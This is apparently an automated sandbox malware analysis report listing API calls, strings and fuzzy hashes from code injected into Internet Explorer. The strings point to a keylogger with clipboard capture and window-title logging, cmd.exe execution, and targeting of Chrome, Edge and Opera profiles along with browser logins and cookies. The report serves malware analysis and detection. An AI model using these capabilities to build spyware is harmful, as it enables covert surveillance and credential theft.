                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: ad2652fbf72fd56d2751cc52da40e1698d25a712ec4b39e6327b896a7ed11b0d
                                                  • Instruction ID: 702e46b30cbe7724e9ab4bdf635285fb4518a4c30681dafd9d722555e4167dce
                                                  • Opcode Fuzzy Hash: ad2652fbf72fd56d2751cc52da40e1698d25a712ec4b39e6327b896a7ed11b0d
                                                  • Instruction Fuzzy Hash: D8F0AF31540608AED338FB60E8B1DDAB3B6DF20350F9045ADD45606A90FF28BE08CEB0
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02D8616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 17c4d52371c0c041742f0d5d501f083be77f4cebd2d400eb0216112d29c0aa38
                                                  • Instruction ID: 0f63b059044dc26bd38d4a62177b8dcf04d3836108347d1859f79de6168c1c90
                                                  • Opcode Fuzzy Hash: 17c4d52371c0c041742f0d5d501f083be77f4cebd2d400eb0216112d29c0aa38
                                                  • Instruction Fuzzy Hash: FFE0C0716443056AD605F6A4D894CABB3AEEE50700F404D1DB04792390FF68DD09CA61
                                                  APIs
                                                  • TerminateThread.KERNEL32(02D7A2B8,00000000,02DE5300,pth_unenc,02D7D0F3,02DE52E8,02DE5300,?,pth_unenc), ref: 02D7B8F6
                                                  • UnhookWindowsHookEx.USER32(02DE5100), ref: 02D7B902
                                                  • TerminateThread.KERNEL32(02D7A2A2,00000000,?,pth_unenc), ref: 02D7B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: 21525967c350b27c6e48651fbb8a20d729f1223114378ecb0d174d3f601c1861
                                                  • Instruction ID: 5c5870c8000cb30828d7989a0b341cc0f04c72a570240f02495f350e46b89f36
                                                  • Opcode Fuzzy Hash: 21525967c350b27c6e48651fbb8a20d729f1223114378ecb0d174d3f601c1861
                                                  • Instruction Fuzzy Hash: 44E0C231644317EFE7200FE0A8988B9BBADEA1438A364482EF2C282324D77A0C54C750
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 02D714B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D714C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 304734e4e1c28e639e263ec9d4064f3f50d754be0a75f188176102d1920bef29
                                                  • Instruction ID: b49c74e923c41f3b0d5b1d5037ee5841938741126180d7603aa736d6c66e4550
                                                  • Opcode Fuzzy Hash: 304734e4e1c28e639e263ec9d4064f3f50d754be0a75f188176102d1920bef29
                                                  • Instruction Fuzzy Hash: 09B092B0DE1743DBBF002BE0B91E85DBB68A614703B90884AF153C1388CBB00C25DF10
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 02D71414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D7141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d923f47f9d3bfcc3f5ad30049e5b6b869cee720dba3691171f4b793b76f129fc
                                                  • Instruction ID: e03fb39f27c6be02ff64b93a6907881a4a1393f3d12dd7f84568856dee3c1b80
                                                  • Opcode Fuzzy Hash: d923f47f9d3bfcc3f5ad30049e5b6b869cee720dba3691171f4b793b76f129fc
                                                  • Instruction Fuzzy Hash: ACB09B70DD1F43DBBF002B70F51DC557725A6047017504815F04395309C7714C24DA10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                  • Instruction ID: 1021514a582f4a96825bf2c5842895bf90ab80ce34b1b60e13029d7f1c1c596c
                                                  • Opcode Fuzzy Hash: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                  • Instruction Fuzzy Hash: 85A12372D04386DFEB228E68C8A0BEEBBE5EF11354F24416DD4969B381D7398D41CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d5eda508bf8b8f7a50855918128fd34f037b8b760304655bf0f97e707c0ae53
                                                  • Instruction ID: 83732343a600f28ab4079d36cf4b1419902706583c41d78be785a1aa5759fbe6
                                                  • Opcode Fuzzy Hash: 1d5eda508bf8b8f7a50855918128fd34f037b8b760304655bf0f97e707c0ae53
                                                  • Instruction Fuzzy Hash: 5841D576640704EFEB269F78CC54BDABBAAEF88710F10452EE446DB380D7719D018BA0
                                                  APIs
                                                  Strings
                                                  • Cleared browsers logins and cookies., xrefs: 02D7C130
                                                  • [Cleared browsers logins and cookies.], xrefs: 02D7C11F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: e3c3129e26adf4fd8add59c013a52dbb61805fc1497c2a5f1cfe6ac7d6c496d1
                                                  • Instruction ID: 619b5b8e8b1d7e23e1e7b6ee15596d7c7e88f194dcd4ee7f88a366add9d149b8
                                                  • Opcode Fuzzy Hash: e3c3129e26adf4fd8add59c013a52dbb61805fc1497c2a5f1cfe6ac7d6c496d1
                                                  • Instruction Fuzzy Hash: 6131B60469C3816DEA2177B424553EABF938F53648F68845EECC50B386FA5A4C08CBF3
                                                  APIs
                                                    • Part of subcall function 02D8C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D8C5F2
                                                    • Part of subcall function 02D8C5E2: GetWindowTextLengthW.USER32(00000000), ref: 02D8C5FB
                                                    • Part of subcall function 02D8C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02D8C625
                                                  • Sleep.KERNEL32(000001F4), ref: 02D7A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 02D7A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: 07953d986fad5dc2a0e7e40b59aa15df9046b1c2b8eec8f61cdd5899be736cf9
                                                  • Instruction ID: 0cce5b73401951cbe7774e46d8f35d79247d531b0066f862199a3cbf5eb12a93
                                                  • Opcode Fuzzy Hash: 07953d986fad5dc2a0e7e40b59aa15df9046b1c2b8eec8f61cdd5899be736cf9
                                                  • Instruction Fuzzy Hash: 9C11933251420197C615FB74CC519AFB7AAEF50300F80451DE496523D5FF29EE18CAE2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fd0c1cac3405f369b02fbf8a3b7e529cbcc8bef43296bd8f0c73b9f3244f0f6
                                                  • Instruction ID: f4bb8eeb7faa8b0fb6e9fb4eee17f6233b49a204046bedb3b8e1f27e6de34a77
                                                  • Opcode Fuzzy Hash: 9fd0c1cac3405f369b02fbf8a3b7e529cbcc8bef43296bd8f0c73b9f3244f0f6
                                                  • Instruction Fuzzy Hash: 0A01D4B2609216BEEA6329686CE0FE7630EDF41BB8F300769F422553C5DB60CC009578
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4eba2c558de2154131d385dfcc1bd93e112393909ffd4ddc0801b6bbd9c657b
                                                  • Instruction ID: d3b32d3f20fc45a35b926c5c7424fada2b7f3a93cffa79f99c018ef51c7a6dd9
                                                  • Opcode Fuzzy Hash: f4eba2c558de2154131d385dfcc1bd93e112393909ffd4ddc0801b6bbd9c657b
                                                  • Instruction Fuzzy Hash: D901A2B2509212BEAA63297CACE0DABB34DEF413B872407A9F423553D8EF60CC149574
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02D7A788), ref: 02D7A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02D7A788), ref: 02D7A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,02D7A788), ref: 02D7A722
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02D7A788), ref: 02D7A729
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID:
                                                  • API String ID: 1958988193-0
                                                  • Opcode ID: f423edfe958adc2807f8ed951bc59db64936ca7efc501b083e5b414baaebfa4f
                                                  • Instruction ID: 8b38b56a7c8a9571ccc68b0daa24bc71eebaeb7e3c96e475199e5e92df6d54f3
                                                  • Opcode Fuzzy Hash: f423edfe958adc2807f8ed951bc59db64936ca7efc501b083e5b414baaebfa4f
                                                  • Instruction Fuzzy Hash: 83110D30641640EADF30B724A4E962E7BFBA74135DF940C09E18247781D7795C24CB21
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,02DB858D,00000000,00000000,00000000,00000000,?,02DB88B9,00000006,FlsSetValue), ref: 02DB8618
                                                  • GetLastError.KERNEL32(?,02DB858D,00000000,00000000,00000000,00000000,?,02DB88B9,00000006,FlsSetValue,02DCF170,02DCF178,00000000,00000364,?,02DB8367), ref: 02DB8624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02DB858D,00000000,00000000,00000000,00000000,?,02DB88B9,00000006,FlsSetValue,02DCF170,02DCF178,00000000), ref: 02DB8632
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: ad4bc579eb663fcabef2fa80a13a9e291d14626d33fe7803615871778d5ad9a5
                                                  • Instruction ID: 5841470d846f7ad79da3013039a4e8abf353abf592da577103c962b191f4c142
                                                  • Opcode Fuzzy Hash: ad4bc579eb663fcabef2fa80a13a9e291d14626d33fe7803615871778d5ad9a5
                                                  • Instruction Fuzzy Hash: B901D432A82267DBCB228A78DC64AE7775CBF05BA1B214A24F947D7340D720DC10C7E4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02D8C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02D8C299
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02D8C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02D8C2CC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: 3d4044d07ddff5c240aab9dbf011eb4c28bb500d6fa56c693705e0c32b926792
                                                  • Instruction ID: ddb72b70458f996c34b9092e799cd0096accb1ee73f64cbd7bebcb03e2840384
                                                  • Opcode Fuzzy Hash: 3d4044d07ddff5c240aab9dbf011eb4c28bb500d6fa56c693705e0c32b926792
                                                  • Instruction Fuzzy Hash: C601D631640216AFE71576949C49FB7B77CCB44B91F104166FA45D2381EF609D4186B2
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 02DA98FA
                                                    • Part of subcall function 02DA9F32: ___AdjustPointer.LIBCMT ref: 02DA9F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 02DA9911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 02DA9923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 02DA9947
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 0e67a72658cf7a84e086f508f699380c13e92e7792a78e270cfefd69a0c6714f
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: DC010832000149BBCF129F95CC20EDA3BBAFF48754F158114F95866220C37AE871DFA0
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 02D8942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 02D89431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 02D89437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 02D8943D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: f1e57f12f2cacd70c391245188bd605ccbcf0fb86b8cd10c139c163520a8aebf
                                                  • Instruction ID: 8694deb5305624b5958b7e71f2cb32f8f54cd84d19b622f49d2168137bb2ebd5
                                                  • Opcode Fuzzy Hash: f1e57f12f2cacd70c391245188bd605ccbcf0fb86b8cd10c139c163520a8aebf
                                                  • Instruction Fuzzy Hash: 9FF04FA1B0431A5BD700FE798864A6B6AD7EFC4360F10087EE6598B381EEB4DC058B95
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02D74066
                                                    • Part of subcall function 02D8BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02DD6478,02D7D248,.vbs,?,?,?,?,?,02DE5300), ref: 02D8BA30
                                                    • Part of subcall function 02D885A3: CloseHandle.KERNEL32(02D740F5,?,?,02D740F5,02DD5E84), ref: 02D885B9
                                                    • Part of subcall function 02D885A3: CloseHandle.KERNEL32(02DD5E84,?,?,02D740F5,02DD5E84), ref: 02D885C2
                                                    • Part of subcall function 02D8C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,02DE5300,00000000,02D82232), ref: 02D8C52F
                                                  • Sleep.KERNEL32(000000FA,02DD5E84), ref: 02D74138
                                                  Strings
                                                  • /sort "Visit Time" /stext ", xrefs: 02D740B2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "
                                                  • API String ID: 368326130-1573945896
                                                  • Opcode ID: 41fc203ff6b964f8d1ea46d60daaed513a82667080eeea0ca1d1386973aeaa24
                                                  • Instruction ID: 289b77f8924a05e07d1ecc79b3752c0fd5ae26f75be85518d1cd9b1f78fc8a2c
                                                  • Opcode Fuzzy Hash: 41fc203ff6b964f8d1ea46d60daaed513a82667080eeea0ca1d1386973aeaa24
                                                  • Instruction Fuzzy Hash: 96314132A101195ACB15FBB4DC959EEB777EF91300F400169E50AA73D4FF289E49CEA1
                                                  APIs
                                                    • Part of subcall function 02DA4801: __onexit.LIBCMT ref: 02DA4807
                                                  • __Init_thread_footer.LIBCMT ref: 02D7B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ad37651bbe86b5d93c1b7d36163b4ebb82b2ec3f2b6a1ec87609bd0cd8791bc3
                                                  • Instruction ID: 61f8ebef3bfbdda7354f3ad4f5f0f76ab70633799184ac3c8e99320748d49300
                                                  • Opcode Fuzzy Hash: ad37651bbe86b5d93c1b7d36163b4ebb82b2ec3f2b6a1ec87609bd0cd8791bc3
                                                  • Instruction Fuzzy Hash: 84216F329002198ADB14FBB5E891DEDB37AEF54314F50012AD50A67390FF78AD4ACEE0
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02DC1E12,?,00000050,?,?,?,?,?), ref: 02DC1C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 80b5d89ffbb6fa68e6cf79545897c86da3557c0901c7200f3adb058a6c95971a
                                                  • Instruction ID: 9cb836df599b777eac4549a17ce6a3c72e80745ed8333d8129f7793adaf954ac
                                                  • Opcode Fuzzy Hash: 80b5d89ffbb6fa68e6cf79545897c86da3557c0901c7200f3adb058a6c95971a
                                                  • Instruction Fuzzy Hash: 3621F762A00127A6DB348A54CB41BEBF266DF54B25FA6402CF94ED7305E732DD01E350
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,02DE55A8,?,00000000,?,?,?,?,?,?,02D85D04,?,00000001,0000004C,00000000), ref: 02D75030
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  • GetLocalTime.KERNEL32(?,02DE55A8,?,00000000,?,?,?,?,?,?,02D85D04,?,00000001,0000004C,00000000), ref: 02D75087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 02D7501F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: ab132c50ffd1d051dae1f56a2bc6f6a3de5c95f77d7d0735d5ca44ad1ba06d88
                                                  • Instruction ID: 582532c3e6d28487a47a9d998f7714abccadd2e49bd8b77f44f57b8057ebc394
                                                  • Opcode Fuzzy Hash: ab132c50ffd1d051dae1f56a2bc6f6a3de5c95f77d7d0735d5ca44ad1ba06d88
                                                  • Instruction Fuzzy Hash: D32101A5D002809BDB10B730B4187AEBB99E75530CFD4091DEC810B395FB295D58CBE3
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: f2ee7b268c219392caefb4cafebeac0aa387ed468d15f34c414955361b8c7555
                                                  • Instruction ID: 07657629ea59639314ebb0bfa86f9f0044c77a663a047a61fe73876df0b76929
                                                  • Opcode Fuzzy Hash: f2ee7b268c219392caefb4cafebeac0aa387ed468d15f34c414955361b8c7555
                                                  • Instruction Fuzzy Hash: 291121725182445AC704FBA5D8659BFF3E9EB54700F500A1EF8D9822D0FF2CDE49CA66
                                                  APIs
                                                    • Part of subcall function 02D7B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02D7B1AD
                                                    • Part of subcall function 02D7B19F: wsprintfW.USER32 ref: 02D7B22E
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  • CloseHandle.KERNEL32(?), ref: 02D7B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 02D7B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: 147e8fc2443afebc4c1b1167c58e12b93394e2ff04a56e8f2a4f8f019c900bb4
                                                  • Instruction ID: 5b7ffb2c3f43cbba94c1a37eb60c3f1d7b796c336f768e0de919d83023b9b449
                                                  • Opcode Fuzzy Hash: 147e8fc2443afebc4c1b1167c58e12b93394e2ff04a56e8f2a4f8f019c900bb4
                                                  • Instruction Fuzzy Hash: 7801D435A006459BD721BB38D81A7BEBBB6DB41308F90045EDDC202785FB692C56CBE2
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02D7C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: 4a35096d315bc3262c66c34d102f80fda772677e8b4ce4ec5b9d394d942c1bae
                                                  • Instruction ID: ad64e70141be66a6fe8e07c57ab30f5526d7163455b6b1e3acd15ac5beaf842d
                                                  • Opcode Fuzzy Hash: 4a35096d315bc3262c66c34d102f80fda772677e8b4ce4ec5b9d394d942c1bae
                                                  • Instruction Fuzzy Hash: 45F05E31A0021A969A04B6A8EC168EE7B2DDA20651F404526A906A2380FF68DD49CAF1
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02D7C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: b9fea4338123137fa5f81151b26461526a4b061730ecf52a68554643e47ff7d9
                                                  • Instruction ID: dc4ffea25ecbbc964315e3bf6bde779d78505ea1c9f0cfcf85ff7148d95729de
                                                  • Opcode Fuzzy Hash: b9fea4338123137fa5f81151b26461526a4b061730ecf52a68554643e47ff7d9
                                                  • Instruction Fuzzy Hash: FEF08231A5021A969B04FAF4E856CFE7B2DDE20651F404156EA06A23D0FF68DC45CBF1
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02D7C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: eae5c67257f7cb8e395f7300c2b1500da42c5a6838f745cb17db17763c19a4d9
                                                  • Instruction ID: 25418d7cd805996c6ce92ae6d9a23b8da508cd2ae7c70dc92687f92e27f2ad6a
                                                  • Opcode Fuzzy Hash: eae5c67257f7cb8e395f7300c2b1500da42c5a6838f745cb17db17763c19a4d9
                                                  • Instruction Fuzzy Hash: 93F08231A1021A96DB04BAB4EC16CFEBF2DDE20751F400116A906623C0FF68DC05CAF1
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 02D7B686
                                                    • Part of subcall function 02D7A41B: GetForegroundWindow.USER32 ref: 02D7A451
                                                    • Part of subcall function 02D7A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 02D7A45D
                                                    • Part of subcall function 02D7A41B: GetKeyboardLayout.USER32(00000000), ref: 02D7A464
